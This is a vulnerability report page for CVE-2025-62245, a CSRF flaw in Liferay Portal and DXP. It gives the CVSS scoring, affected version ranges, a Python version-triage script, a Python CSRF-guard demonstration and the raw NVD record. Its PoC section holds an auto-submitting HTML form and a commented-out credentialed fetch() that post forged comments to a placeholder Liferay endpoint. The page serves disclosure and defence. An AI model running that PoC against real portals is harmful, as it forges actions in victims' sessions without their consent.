Security Vulnerability Report
CVE-2025-62245 CVSS 4.3 MEDIUM

CVE-2025-62245

Published: 2025-10-10 20:15:39
Last Modified: 2025-12-12 18:11:07

Description

Cross-site request forgery (CSRF) vulnerability in Liferay Portal 7.4.1 through 7.4.3.112, and Liferay DXP 2023.Q4.0 through 2023.Q4.5, 2023.Q3.1 through 2023.Q3.10, and 7.4 GA through update 92 allows remote attackers to add and edit publication comments.

CVSS Details

CVSS Score
4.3 (NVD, CVSS 3.1)
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
Vendor CVSS 4.0 (secondary metric in the raw record below)
5.1 MEDIUM, CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
Weakness
CWE-352 (Cross-Site Request Forgery)

Reading the vector: the attacker needs no account on the portal (PR:N) but must get a victim who is already logged in to open an attacker-controlled page (UI:R; UI:A in the 4.0 vector). The only impact is to integrity, and a low one (I:L), because the forged request can only add or edit publication comments.

Configurations (Affected Products)

cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:* - VULNERABLE (versionStartIncluding 2023.Q3.1, versionEndIncluding 2023.Q3.10)
cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:* - VULNERABLE (versionStartIncluding 2023.Q4.0, versionEndExcluding 2023.Q4.6)
cpe:2.3:a:liferay:digital_experience_platform:7.4:*:*:*:*:*:*:* - VULNERABLE (no version range in the NVD entry; the description bounds it at 7.4 GA through update 92)
cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:* - VULNERABLE (versionStartIncluding 7.4.1, versionEndExcluding 7.4.3.113)

Liferay Portal 7.4.1 - 7.4.3.112 (NVD range excludes 7.4.3.113 and later)
Liferay DXP 2023.Q4.0 - 2023.Q4.5 (NVD range excludes 2023.Q4.6 and later)
Liferay DXP 2023.Q3.1 - 2023.Q3.10
Liferay DXP 7.4 GA - update 92
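The four CPE entries above carry the affected ranges as versionStartIncluding / versionEndIncluding / versionEndExcluding bounds in the NVD record, which is what a triage script should evaluate rather than the bare CPE strings. The following Python is an added example, not part of this page and not NVD or Liferay tooling: it checks an installed product/version pair against those bounds. CPE_MATCHES is a constructed copy of the page's own range data (matchCriteriaId dropped); the digit-only version tokenizer (so that 2023.Q4.5 compares as (2023, 4, 5)) and the prefix treatment of the unranged DXP 7.4 entry are simplifying assumptions.

```python
"""Evaluate the NVD CPE version ranges for CVE-2025-62245 against an installed version."""
import re

# Constructed copy of the cpeMatch entries in the page's NVD record (matchCriteriaId dropped).
CPE_MATCHES = [
    {"criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*",
     "versionStartIncluding": "2023.Q3.1", "versionEndIncluding": "2023.Q3.10"},
    {"criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*",
     "versionStartIncluding": "2023.q4.0", "versionEndExcluding": "2023.q4.6"},
    {"criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:*:*:*:*:*:*:*"},
    {"criteria": "cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:*",
     "versionStartIncluding": "7.4.1", "versionEndExcluding": "7.4.3.113"},
]


def version_key(version):
    """Tuple of the digit runs in a version string: '2023.Q4.5' -> (2023, 4, 5),
    '7.4.3.112' -> (7, 4, 3, 112). Assumption: this ordering matches Liferay's own."""
    return tuple(int(n) for n in re.findall(r"\d+", version))


def cpe_fields(criteria):
    """vendor, product and version fields of a CPE 2.3 formatted string."""
    parts = criteria.split(":")
    return parts[3], parts[4], parts[5]


def entry_matches(entry, product, version):
    vendor, cpe_product, cpe_version = cpe_fields(entry["criteria"])
    if vendor != "liferay" or cpe_product != product:
        return False
    v = version_key(version)
    if cpe_version != "*":
        # Unranged entry (the DXP 7.4 line): NVD gives no update bound, so treat it as a
        # prefix match and confirm the update number against the description by hand.
        prefix = version_key(cpe_version)
        return v[:len(prefix)] == prefix
    start_inc = entry.get("versionStartIncluding")
    end_inc = entry.get("versionEndIncluding")
    end_exc = entry.get("versionEndExcluding")
    if start_inc is not None and v < version_key(start_inc):
        return False
    if end_inc is not None and v > version_key(end_inc):
        return False
    if end_exc is not None and v >= version_key(end_exc):
        return False
    return True


def is_affected(product, version, entries=CPE_MATCHES):
    """True if any entry in the record covers this product/version pair."""
    return any(entry_matches(e, product, version) for e in entries)


def affected_entries(product, version, entries=CPE_MATCHES):
    """The criteria strings that matched, for the triage report."""
    return [e["criteria"] for e in entries if entry_matches(e, product, version)]


if __name__ == "__main__":
    for product, version in [("liferay_portal", "7.4.3.112"),
                             ("liferay_portal", "7.4.3.113"),
                             ("digital_experience_platform", "2023.Q4.5"),
                             ("digital_experience_platform", "2023.Q4.6"),
                             ("digital_experience_platform", "7.4.13")]:
        print(product, version, "AFFECTED" if is_affected(product, version) else "not affected")
```

The boundary cases are the ones worth checking: versionEndIncluding keeps 2023.Q3.10 inside the range, versionEndExcluding puts 7.4.3.113 and 2023.Q4.6 outside it, and the unranged DXP 7.4 entry matches every 7.4.x build, so that line needs the "through update 92" qualifier from the description before it is reported.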

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-62245 CSRF PoC for Liferay Portal/DXP publication comments -->
<!-- Demonstrates how an attacker-controlled page makes a logged-in victim's browser
     add or edit a publication comment on the victim's Liferay instance. -->
<!-- CAVEATS:
     * The form action below is a placeholder, not an endpoint confirmed by the vendor
       advisory. Capture a legitimate comment submission on a test instance (browser
       devtools or a proxy) and use that request's real path, method, parameter names
       and content type here.
     * A CSRF form POST only works for requests a browser sends without a CORS preflight:
       application/x-www-form-urlencoded, multipart/form-data or text/plain bodies. -->
<html>
<head>
  <title>CVE-2025-62245 CSRF PoC</title>
</head>
<body>
  <!-- The form auto-submits when the page loads. The victim's session cookie is sent
       with it; nothing in the request proves the victim intended it. -->
  <!-- Replace TARGET_LIFERAY_HOST with the target host and {siteId}/{publicationId}
       with the target publication. -->
  <form id="csrf-form" method="POST"
        action="https://TARGET_LIFERAY_HOST/o/headless-delivery/v1.0/sites/{siteId}/publications/{publicationId}/comments">
    <!-- Publication comment content to be added/edited; field names are placeholders -->
    <input type="hidden" name="comment" value="Malicious comment injected via CSRF (CVE-2025-62245)" />
    <input type="hidden" name="description" value="This comment was added without user consent" />
  </form>
  <script>
    // Auto-submit the form when the victim visits this page
    document.getElementById('csrf-form').submit();
  </script>

  <!-- Alternative: fetch() with credentials. NOTE: a cross-origin POST with
       Content-Type: application/json is not a "simple" request, so the browser sends
       an OPTIONS preflight first and only follows through if the server's CORS policy
       echoes the attacker origin in Access-Control-Allow-Origin and sets
       Access-Control-Allow-Credentials: true. Against a correctly configured server
       this variant fails; it is useful only for testing a CORS misconfiguration. -->
  <script>
    // Uncomment below for fetch-based exploitation
    /*
    fetch('https://TARGET_LIFERAY_HOST/o/headless-delivery/v1.0/sites/{siteId}/publications/{publicationId}/comments', {
      method: 'POST',
      credentials: 'include', // send the victim's cookies with the request
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({
        comment: 'Malicious comment via CSRF (CVE-2025-62245)',
        description: 'Injected without user consent'
      })
    });
    */
  </script>
</body>
</html>
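Whatever the exact request shape turns out to be, the server-side fix for CWE-352 is the same: stop accepting a state-changing request on the strength of the session cookie alone. The Python below is an added example, not Liferay's code and not a description of the patched build. It shows a comment handler before and after a three-layer CSRF guard (Fetch Metadata, Origin/Referer, synchronizer token) and replays the two PoC shapes above against both. The app origin, the csrf_token field name and the Request class are assumptions made for the demonstration.

```python
"""CSRF guard demonstrating the CWE-352 mitigations a comment endpoint needs."""
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

APP_ORIGIN = "https://portal.example"   # constructed origin of the protected app
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}
TOKEN_FIELD = "csrf_token"              # hidden-field name; an assumption, not Liferay's


@dataclass
class Request:
    """Minimal stand-in for an HTTP request as the server sees it (constructed)."""
    method: str
    headers: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)
    session_user: str = "alice"          # cookie-authenticated user (ambient credential)

    def header(self, name):
        return next((v for k, v in self.headers.items() if k.lower() == name.lower()), None)


def new_csrf_token():
    """Per-session secret: stored server-side, echoed into each form as a hidden field."""
    return secrets.token_urlsafe(32)


def origin_of(url):
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}".lower()


def add_comment_vulnerable(req, store):
    """Before: trusts the session cookie alone, so any site can make the browser POST here."""
    store.setdefault(req.session_user, []).append(req.form.get("comment", ""))
    return True


def csrf_check(req, session_token):
    """Return (ok, reason). All three layers must pass for a state-changing request."""
    if req.method.upper() in SAFE_METHODS:
        return True, "safe method"

    # Layer 1: Fetch Metadata. The browser sets Sec-Fetch-Site; a page cannot forge it.
    sfs = req.header("Sec-Fetch-Site")
    if sfs is not None and sfs not in ("same-origin", "none"):
        return False, f"Sec-Fetch-Site={sfs}"

    # Layer 2: Origin (or Referer as fallback) must be this app. Browsers send Origin on
    # cross-origin form POSTs, so a POST with neither header is rejected as well.
    src = req.header("Origin") or req.header("Referer")
    if src is None or origin_of(src) != APP_ORIGIN:
        return False, f"origin {src!r} not allowed"

    # Layer 3: Synchronizer token, compared in constant time.
    submitted = req.form.get(TOKEN_FIELD) or req.header("X-CSRF-Token") or ""
    if not hmac.compare_digest(submitted.encode(), session_token.encode()):
        return False, "missing or wrong CSRF token"
    return True, "ok"


def add_comment_hardened(req, store, session_token):
    """After: the same handler behind the guard; forged requests never reach the store."""
    ok, _reason = csrf_check(req, session_token)
    if ok:
        store.setdefault(req.session_user, []).append(req.form.get("comment", ""))
    return ok


def demo():
    """Replay a legitimate submit and the two PoC shapes against both handlers."""
    token = new_csrf_token()
    legit = Request("POST", {"Origin": APP_ORIGIN, "Sec-Fetch-Site": "same-origin"},
                    {"comment": "looks good", TOKEN_FIELD: token})
    # Auto-submitted cross-site form: the cookie rides along, the token does not.
    poc_form = Request("POST", {"Origin": "https://attacker.example",
                                "Sec-Fetch-Site": "cross-site",
                                "Referer": "https://attacker.example/poc.html"},
                       {"comment": "Malicious comment"})
    # fetch(..., credentials: 'include') from an older browser without Fetch Metadata.
    poc_fetch = Request("POST", {"Origin": "https://attacker.example",
                                 "Content-Type": "application/json"})
    # Same-origin request carrying a guessed token: also rejected.
    stale = Request("POST", {"Origin": APP_ORIGIN, "Sec-Fetch-Site": "same-origin"},
                    {"comment": "x", TOKEN_FIELD: "guess"})

    before, after = {}, {}
    for r in (legit, poc_form, poc_fetch, stale):
        add_comment_vulnerable(r, before)
        add_comment_hardened(r, after, token)
    return {"vulnerable_stored": len(before["alice"]),
            "hardened_stored": len(after["alice"]),
            "poc_form": csrf_check(poc_form, token)[1],
            "poc_fetch": csrf_check(poc_fetch, token)[1]}


if __name__ == "__main__":
    print(demo())
```

The layers are ordered cheapest first, but none of them is sufficient alone: Fetch Metadata is absent on older clients, Origin and Referer can be suppressed by referrer policy, and the token is the one check the attacker's page cannot satisfy without a separate bug that leaks it. The guard also ignores the request's Content-Type on purpose; relying on "JSON bodies cannot be forged" is exactly what a permissive CORS policy breaks.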

References

Vendor Advisory: https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-62245

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62245", "sourceIdentifier": "[email protected]", "published": "2025-10-10T20:15:39.373", "lastModified": "2025-12-12T18:11:07.027", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-site request forgery (CSRF) vulnerability in Liferay Portal 7.4.1 through 7.4.3.112, and Liferay DXP 2023.Q4.0 through 2023.Q4.5, 2023.Q3.1 through 2023.Q3.10, and 7.4 GA through update 92 allows remote attackers to add and edit publication comments."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", 
"vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.Q3.1", "versionEndIncluding": "2023.Q3.10", "matchCriteriaId": "DB698493-4763-4E87-9764-BC36906CCF5C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.q4.0", "versionEndExcluding": "2023.q4.6", "matchCriteriaId": "7C41E249-91C4-4B2D-A8D2-C953A463E14F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:*:*:*:*:*:*:*", "matchCriteriaId": "8E19E344-92B4-4B46-BD89-25EC7191972C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.1", "versionEndExcluding": "7.4.3.113", "matchCriteriaId": "26C6657F-B0C5-46DD-9FE5-25004EC2003D"}]}]}], "references": [{"url": "https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-62245", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}